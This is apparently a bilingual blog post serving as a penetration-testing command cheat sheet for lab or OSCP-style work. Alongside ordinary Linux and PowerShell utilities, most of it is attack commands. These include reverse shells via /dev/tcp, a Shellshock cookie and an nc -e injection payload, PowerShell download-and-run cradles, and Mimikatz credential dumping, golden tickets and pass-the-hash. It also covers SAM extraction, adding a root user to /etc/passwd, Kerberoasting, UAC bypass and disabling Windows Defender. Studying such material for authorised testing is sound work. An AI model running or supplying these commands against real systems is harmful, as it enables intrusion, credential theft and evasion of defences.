Tools && Command

一些常用的工具和命令

Linux

  • Base
    • : split
    • Python3 Creation of virtual environments
    • OpenVPN
    • Json validate and pretty-print(Python module)
    • Json validate and pretty-print(jq command)
    • rlwrap
    • stty
    • Multiple lines to one line
    • rdesktop
    • wget https
    • nc prot scan
    • Quick file transfer
  • awk
  • sed
  • mount

: split

1
cut -d ":" -f 1

Python3 Creation of virtual environments

1
2
3
4
5
python3 -m venv $(pwd)
source bin/activate

# exit
deactivate

OpenVPN

1
sudo openvpn --config OSCP-00000.ovpn --daemon

Json validate and pretty-print

1
2
3
python -m json.tool out.json 

cat out.json | python -m json.tool

jq JSON validate and pretty-print

1
2
# ffuf ... -o output.json
cat output.json | jq '.results[0].url'

rlwrap

1
rlwrap nc -lvnp 9999

stty

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# reverse shell tab 补全(体验更好的 reverse shell)

# 受控机器
python -c 'import pty; pty.spawn("/bin/bash")'

# ^Z / Ctrl + z 切入后台
stty raw -echo

# 返回受控机器(fg 是看不见的)
fg

# 按两次回车
# 设置受控机器 env
export TERM=xterm256-color

Multiple lines to one line

1
2
# 多行转一行
cat sqlserver.hash | xargs | sed -e 's/ //g'

rdesktop

1
rdesktop -u carol -p xxxxxxx 127.0.0.1 -r clipboard:CLIPBOARD -g 3584x2240@200

wget https

1
wget --no-check-certificate https://www.exploit-db.com/download/28806 -O 28806.zip

Nc Port Scan

1
nc -zvn -w 1 10.3.3.14 20-1000 2>&1 | tee port.txt

Quick file transfer

1
2
3
4
5
# Attack 
nc -lvnp 4444 > file

# Victim
cat file > /dev/tcp/10.10.11.11/4444

awk

1
cat wordlists | awk 'length($1) > 4'
1
awk '{for(i=1;i<=NF;i++){print $i}}'
1
echo "user:name" | awk -F: '{print $1}'

sed

1
2
3
4
5
6
7
8
9
head -4 useProt.txt 
#    1 10000/tcp
#    1 10243/tcp
#    1 1026/tcp
#    1 1028/tcp

cat Prot.txt | awk '{print $2}' | sort -un | xargs | sed -e 's/\/tcp//g' | sed -e 's/ /, /g'

# 21, 22, 25, 53, 80, 88, 110, 111, 113, 119, 135, 139, 143

删除 evil开头的那一行

1
sed -i "/^evil/d" /etc/passwd

不显示 evil开头的那一行(原文件不变)

1
sed -e "/^evil/d" /etc/passwd

替换包含 evil字符串的行(注意 /c)

1
2
3
4
sed -i '/evil/cevil:xxxx' pass

# r : xxxx:evil
# n : evil:xxxx

mount

1
2
mount -t cifs -o user=luke //10.11.x.x/share /mnt/<local_folder>
mount -t cifs //10.11.x.x/'Bob Share' /mnt/smb -o rw,vers=1.0,dir_mode=0777,file_mode=0666,nounix

Windows

  • Base
    • PATH List
    • Split string with
    • Set Windows PATH For The Current Session
    • rundll32
    • cmdkey list
    • service start/stop
    • whoami
    • Add users to the group
    • look at the domain’s account policy(Low and Slow Password Guessing)
    • delete file/folder
    • findstr color
    • where
    • setspn
    • tasklist
    • firewall
    • runas
    • Extracting the SAM database
  • Powershell
    • Powershell Like Grep
    • Powershell ExecutionPolicy
    • Run command in backgroud
    • Target architecture
    • Copy to a remote computer
    • Remote to local computer
    • like find . / ls -al
    • PSCredential plain-text passwd
    • New-PSDrive Remote Computer
    • Port Scan
    • Find Keyword
    • Disable/Enable Windows Defender

PATH List

1
2
3
4
echo %PATH:;=&echo.%

# powershell
$env:PATH

Split string with

1
2
3
4
5
6
7
8
$p=$env:PATH
$p.Split(";")

# %SystemRoot%\system32\WindowsPowerShell\v1.0\
# C:\Windows\system32
# C:\Windows
# C:\Windows\System32\Wbem
# C:\Windows\System32\WindowsPowerShell\v1.0\

Set Windows PATH For The Current Session

1
2
3
4
5
6
7
set PATH="%PATH%;C:\path\to\directory\"

# powershell
$env:PATH += "C:\Users\0x20C\Desktop\Pentest\Sigcheck\"

# if Windows 7
$env:PATH += ";C:\Users\0x20C\Desktop\Pentest\Sigcheck\"

rundll32

1
2
# dll, function name, arguments
rundll32.exe open_cmd_dll.dll,InvokeCmd

cmdkey list

1
cmdkey /list

service start/stop

1
net stop service && net start service

whoami

1
2
3
whoami /groups

whoami /priv

Add users to the group

1
2
3
4
5
net localgroup "Remote Desktop users" evil /add
net localgroup  "Debugger Users" evil /add

# winrm (evil-winrm)
net localgroup "Remote Management Users" evil /add

look at the domain’s account policy

1
2
3
4
5
6
# Lockout threshold(锁定阈值)
# Lockout observation window (minutes)(锁定观察窗口)
net accounts

# Low and Slow Password Guessing
# Spray-Passwords.ps1

delete file/folder

1
2
3
4
del re.exe
rd /s /q C:\tools

rd folder

findstr color

1
findstr /n /i /a:6 /s "Password" config.xml

where

1
2
3
where /r C:\windows eventvwr.exe
# C:\Windows\System32\eventvwr.exe
# C:\Windows\SysWOW64\eventvwr.exe

setspn

1
setspn -T SV-DC01 -Q */*

tasklist

1
2
3
tasklist
taskkill /PID 1864 /F
taskkill /im:shell.exe /f

firewall

1
2
3
4
5
netsh firewall show state
# Port
netsh firewall show portopening
netsh firewall show currentprofile
netsh firewall show config

runas

1
2
3
4
cmdkey /add:domain /user:USER /pass:PASS
cmdkey /delete:Domain:interactive=BETHANY\alice

runas /savecred /user:alias cmd.exe

Extracting the SAM database

1
2
3
reg save hklm\sam C:\SAM
reg save hklm\system C:\SYSTEM
reg save hklm\security C:\SECURITY

Powershell

Powershell like grep

1
Select-String -Pattern "requestedExecutionLevel" -Context 0,2

Powershell ExecutionPolicy

1
2
powershell.exe -Nop -ExecutionPolicy Bypass -File C:\Windows\System32\spool\drivers\color\ps.ps1
powershell.exe -Nop -ep Bypass -File C:\Windows\System32\spool\drivers\color\ps.ps1

Run command in backgroud

1
2
3
4
5
6
7
8
9
# cmd
start /b powershell -nop -enc SQBFA...

# powershell
# Invoke-Command -AsJob
Invoke-Command -AsJob -ComputerName XOR-APP23 -Credential $crel -ScriptBlock { powershell -nop -enc SQB... }

# Jobs list
Get-Job

Target architecture

1
2
3
4
5
$ENV:PROCESSOR_ARCHITECTURE

[IntPtr]::Size
# 4 => 32bit
# 8 => 64bit
1
2
3
$session = New-PSSession -ComputerName XOR-APP23 -Credential $crel

Get-PSSession

Copy to a remote computer

1
Copy-Item "C:\files\mimikatz.exe" -Destination "C:\Users\Public\Documents\" -ToSession $session -Recurse

Remote to local computer

1
Copy-Item "C:\Users\ik.ps1" -Destination "C:\Documents\" -FromSession $session -Recurse

like find . / ls -al

1
Get-ChildItem -Path . -Recurse -Force

PSCredential plain-text passwd

1
2
3
4
5
6
$password = ConvertTo-SecureString 'MySecretPassword' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential ('root', $password)

# Get plain-text passwd
$credential.GetNetworkCredential()
$credential.GetNetworkCredential().Password

New-PSDrive Remote Computer

1
2
3
4
5
6
7
8
9
10
11
12
13
smbserver.py -smb2support -username admin -password 123456 shareme $(pwd)
# null passwd
New-PSDrive -Name evil -PSProvider FileSystem -Root \\192.168.119.167\shareme

# Use Passwd
$sp = ConvertTo-SecureString '123456' -AsPlainText -Force

$cred = New-PSDrive -Name evil -PSProvider FileSystem -Root \\192.IP\shareme                                           
New-PSDrive -Name evil -PSProvider FileSystem -Credential $cred -Root \\192.IP\shareme

Remove-PSDrive -Name evil

Get-PSDrive

Port Scan

1
2
3
$ports = "21 22 25 53 80 111 139 443 445 3306 3389 8000 8080"
$ip    = "192.168.0.100"
$ports.split(" ") | % {echo ((new-object Net.Sockets.TcpClient).Connect($ip,$_)) "Port $_ is open on $ip"} 2>$null

Find Keyword

1
gci C:\www -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password"

Disable/Enable Windows Defender

1
2
3
4
5
# Disable
Set-MpPreference -DisableRealtimeMonitoring $true

# Enable
Set-MpPreference -DisableRealtimeMonitoring $false

Tools

  • Port Scan
    • Nmap
    • Masscan
  • Mimikatz
  • PsExec
  • JuicyPotato
  • SMB
    • psexec.py
    • wmiexec.py
    • smbclient
  • Password
    • hashcat
    • cewl
    • hydra
  • MSF
    • msfconsole
  • Hash
  • Web
    • Scan
    • Dir Enum
    • Password Attack
    • SQL Injection
  • Ldap

Port Scan

Nmap

1
nmap -sU -sV --top-ports 100 -oA nmap/top_100_udp 10.11.1.44
1
proxychains4 nmap -Pn -sT -sC -sV -oA nmap/full 10.1.xx.x

Masscan

1
masscan -p1-65535,U:1-65535 10.11.1.111 --rate=1000 -e tun0 > ports

Mimikatz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# system priv
mimikatz.exe "lsadump::sam" exit

mimikatz.exe "lsadump::secrets" exit

mimikatz.exe "kerberos::list /export" "exit"

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# history0 is a last change passwd
mimikatz.exe "lsadump::setntml /user:USER /ntml:NTML" exit

# MsCacheV2
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::cache" "exit"

# log
mimikatz.exe "log" "privilege::debug" "token::elevate" "lsadump::dcsync /user:Krbtgt" "exit"

mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::msv" "exit"

# cmdkey
mimikatz.exe "vault::cred" "exit"

# pth
mimikatz.exe "sekurlsa::pth /user:alice /domain:SVCORP.COM /ntlm:xxx04xx6B8F7B2A3B6C47780xxxxxxxx /run:C:\Windows\System32\spool\drivers\color\re9.exe" "exit"

mimikatz.exe "kerberos::golden /user:evil /domain:corp.com /sid:S-1-5-21-x-x-x /rc4:7xxx5 /ptt"
mimikatz.exe "kerberos::golden /user:evil /domain:corp.com /sid:S-1-5-21-x-x-x /target:xxx.corp.com /service:HOST /krbtgt:7xxx5 /ptt"
mimikatz.exe "misc::cmd"

PsExec

local cmd

1
PsExec64.exe -i -u awsl -p callme1234 C:\Windows\System32\cmd.exe

JuicyPotato

1
2
3
4
# JuicyPotato reverse shell
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.167 LPORT=4445 -f exe -o re.exe
# CLSID : https://ohpe.it/juicy-potato/CLSID/
cmd /c 'JuicyPotato.exe -l 1234 -p re.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}'

SMB

psexec

1
psexec.py -hashes :700a8c186d267b607559db7xxxxxxxxxx Administrator@10.11.1.13
1
wmiexec.py -hashes :700a8c186d267b607559db7xxxxxxxxxx Administrator@10.11.1.13

crackmapexec

1
2
3
crackmapexec smb 10.11.x.x -u Administrator -H xxxxxxxxxxHash

crackmapexec smb 10.11.x.x -u USER.list -p PASSWD.list

smbclient

1
2
3
4
smbclient ////10.11.1.13//share
smbclient //10.11.1.13/share
smbclient -L 10.11.1.231
smbclient //share/home -I 192.10.2.11 -N

Password

1
hashcat --force --stdout -a 6 year.pass ?d?d?d?d?s > result.pass
1
proxychains cewl -m 3 -a --with-numbers http://10.11.1.x -w cewl.txt
1
hydra -I -l root@localhost -P cewl.txt 10.11.1.xx http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed"

MSF

msfconsole

1
2
3
4
5
6
portfwd add -l 8888 -p 445 -r 10.11.1.14
portfwd add -l 445 -p 445 -r 10.11.1.14

# msf portfwd
# [*] Local TCP relay created: :8888 <-> 10.11.1.14:445
# localhost:8888 --> 10.11.1.14:445

Suggester

1
use post/multi/recon/local_exploit_suggester

UAC

1
2
use exploit/windows/local/bypassuac_sdclt
getsystem

Kiwi

1
2
# 注意引号
kiwi_cmd '"sekurlsa::tickets /export"'

Search

1
2
search handler type:exploit
search cve:2007-2446

Upload File

1
upload /tmp/callme.vbs C:\callme.vbs

Route

1
2
3
4
5
6
meterpreter > run get_local_subnets
# Local subnet: 10.12.1.0/255.255.255.0

meterpreter > run autoroute -s 10.12.1.0/255.255.255.0

meterpreter > run autoroute -p

Modules

1
$HOME/.msf4/modules

searchsploit 45269

1
2
3
PATH
-----------------------
windows/local/45269.rb

copy to modules

1
2
3
mkdir -p $HOME/.msf4/modules/windows/local

searchsploit -m windows/local/45269.rb

Hash

Extracting hash from SAM(local)

1
2
3
4
5
reg save hklm\sam C:\SAM
reg save hklm\system C:\SYSTEM
reg save hklm\security C:\SECURITY

impacket-secretsdump -system system -sam sam -security security LOCAL

List history passwd

1
2
# List history passwd
secretsdump.py -just-dc -history -hashes LM:NTLM Administrator@10.11.x.x

Web

Scan

1
2
3
4
5
nikto -host http://10.11.1.39 -o nikto.json -Format json -Display P
nikto -host http://10.11.1.39 -Plugins robots

# dir_traversal,clientaccesspolicy,msgs,shellshock,robots,
# content_search,httpoptions,put_del_test,sitefiles,strutshock

Dir Enum

1
ffuf -c -t 30 -fc 403 -w wordlists:DIR -w extensions:EX -u https://127.0.0.1/DIR.EX -o out
1
2
3
4
5
# Wordlists -> /uar/share/seclists/fuzz/*
wfuzz -c -u http://10.10.10.79/api/get -w /path/to/wordlists -d '{"name": "FUZZ"}'

# Proxy -> burp
wfuzz -c -u http://10.10.10.79/api/get -w /path/to/wordlists -d '{"name": "FUZZ"}' -p 127.0.0.1:8080:HTTP
1
feroxbuster --depth 2 -u http://10.11.1.xx/php/ -x php,txt,conf,cgi -t 50

Password Attack

1
hydra -I -l root@localhost -P cewl.txt 10.11.1.xx http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed"

SQL Injection

1
sqlmap -u http://10.11.1.x/login-off.asp --data='txtLoginID=admin&txtPassword=admin&cmdSubmit=Login' --skip='cmdSubmit' --dbms='Microsoft SQL Server' --random-agent

Ldap

1
ldapsearch -LLL -x -H ldap://sv-dc01.svcorp.com -b '' -s base '(objectclass=*)'

Exploit

  • pseudo-terminal
  • searchsploit
  • shellshock attack
  • /etc/passwd is writable
  • powershell run .ps1 Script
  • NFS easy exploit
  • if missing ticket
  • Kerberoasting
  • Crack MsCacheV2(DCC2)
  • Unquoted Search Path
  • group in docker

pseudo-terminal

1
2
3
4
5
6
7
# start up
python -c "import pty;pty.spawn('/bin/bash')"
export SHELL=/bin/bash 
alias ls='ls --color=auto' 
alias ll='ls -alh --color=auto'
alias grep='grep --color=auto'
export TERM=xterm-256color

searchsploit

1
2
3
searchsploit --id MS17-017
searchsploit -m xxx
searchsploit --nmap allport.xml

shellshock attack

1
2
Cookie:  () { :;}; /bin/bash -c 'whoami; id; ifconfig'
Cookie:  () { :;}; /bin/bash -c 'exec bash -i &>/dev/tcp/192.168.119.167/4444 <&1'

/etc/passwd is writable

1
2
3
4
5
openssl passwd callme

echo "evil:NIk9BGd8Qt8dI:0:0:root:/root:/bin/bash" >> /etc/passwd

su evil

powershell 运行 .ps1 脚本

1
2
powershell -ep Bypass slui_bypass_uac.ps1
powershell -Exec Bypass slui_bypass_uac.ps1

NFS easy exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
showmount -e 10.11.1.xx
# vers=3 display UID PID
mount -t nfs -o vers=3 10.11.1.x:/home /tmp/home

# Permission denied
useradd test 
# change UID GID /etc/passwd

# if share /home
mkdir .ssh 
ssh-keygen -f target
cat target.pub > authorized_keys
cp authorized_keys /tmp/home/USER/.ssh/

ssh USER@10.11.1.x -i target

if missing ticket

1
2
3
4
# missing ticket
Invoke-Kerberoast.ps1
# or
Get-SPN.ps1

Kerberoasting / John / Hashcat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
mimikatz.exe "kerberos::list /export" "exit"

# Convert *.kirbi to john
python /opt/kirbi2hashcat/kirbi2hashcat.py *.kirbi > hashcat/allhash.txt
python /usr/share/john/kirbi2john.py *.kirbi > john/alljohn.txt
# $krb5tgs$18$...

john --format=krb5tgs hashcat/allhash.txt -w=/usr/share/wordlists/rockyou.txt


# Convert *.kirbi to hashcat
Powershell-Empire - Invoke-kerberoast - Hashcat format
# or Invoke-Kerberoast.ps1
Import-Module Invoke-Kerberoast.ps1
Invoke-Kerberoast -Domain xor.com -OutputFormat HashCat | Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt
# $krb5tgs$23$ ...

hashcat -m 13100 hashs/allhash.txt wordlist/rockyou.txt --force


# Use crel
$ python /opt/impacket/examples/GetUserSPNs.py -request xor.com/sqlserver -dc-ip 10.11.1.120
Password: xxxx

Crack MsCacheV2(DCC2)

1
2
3
4
5
6
john --format=mscash2 mscash2.hash -w=/usr/share/wordlists/rockyou.txt
# username:hash

hashcat -m 2100 hashs/mscash2.hash wordlist/rockyou.txt --force
# $DCC2$10240#username#HASH
# https://tinyapps.org/docs/domain-cached-credentials.html

Unquoted Search Path

1
2
3
4
5
6
7
8
9
10
11
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows"

# C:\Local\Bad Program\command.exe
# icacls "C:\Local"
# BUILTIN\Users:(W)

# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=80 -f exe -o Program.exe
# or
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=80 -e x86/shikata_ga_nai -i 7 -f raw > met.bin
# Use shellter injection .bin in binary program (ex. whoami.exe)
# rename whoami.exe -> Bad.exe -> C:\Local\

group in docker

1
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Misc

1
2
3
4
5
6
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
i686-w64-mingw32-gcc 1198.c -o ms05-018.exe -lws2_32 advapi32.lib

# 64 bit and 32 bit
i686-w64-mingw32-gcc -o win32.exe win32.c
x86_64-w64-mingw32-gcc -o win64.exe win32.c
1
gcc -Wl,--hash-style=both -o exp exploit.c

可写目录

1
2
# 可写目录
C:\Windows\System32\spool\drivers\color

可读文件

1
2
# 可读文件
C:\Windows\win.ini

go 不同架构系统编译

1
2
3
4
5
6
7
8
# GOOS : darwin, freebsd, linux, windows
# GOARCH : 386, amd64, arm

GOOS=linux GOARCH=amd64 go build -o linux_64
GOOS=linux GOARCH=386 go build -o i386_64

GOOS=windows GOARCH=amd64 go build -o win_64
GOOS=windows GOARCH=386 go build -o win_32

Nc one line

1
2
<!-- nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.16.3'$IFS'4444' -->
<img src=http://10.10.16.3/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.16.3'$IFS'4444') />

Note

1
2
3
4
# 调用 Powershell IEX() 引号问题
# ...cmd('powershell "IEX()"')

powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.11.1.11/callme.ps1')"
1
2
3
echo "IEX(New-Object Net.WebClient).DownloadString('http://10.11.1.11/callme.ps1')" | iconv -t UTF-16LE | base64 -w 0

# SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMQAuADEALgAxADEALwBjAGEAbABsAG0AZQAuAHAAcwAxACcAKQAKAA==
1
powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMQAuADEALgAxADEALwBjAGEAbABsAG0AZQAuAHAAcwAxACcAKQAKAA==
1
2
3
4
5
6
7
# PROGRA~1 = Program Files

cd "C:\Program Files\Windows Defender"
# or
cd "C:\PROGRA~1\Windows Defender"

MpCmdRun.exe -RemoveDefinitions -All

bash 单双引号

1
2
3
4
5
6
7
8
echo -e "#!/bin/bash\nrm -rf /TMP/*" > cron
# bash: !/bin/bash\nrm: event not found

echo -e '#!/bin/bash\nrm -rf /TMP/*' > cron

cat cron
#!/bin/bash
rm -rf /TMP/*

echo -n

1
2
3
4
5
echo "63616c632e657865" | wc -c
# 17

echo -n "63616c632e657865" | wc -c
# 16

小端显示

1
2
echo "1120110D" | tac -rs .. | echo "$(tr -d '\n')"
# 0D112011
工具使用
Tools

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!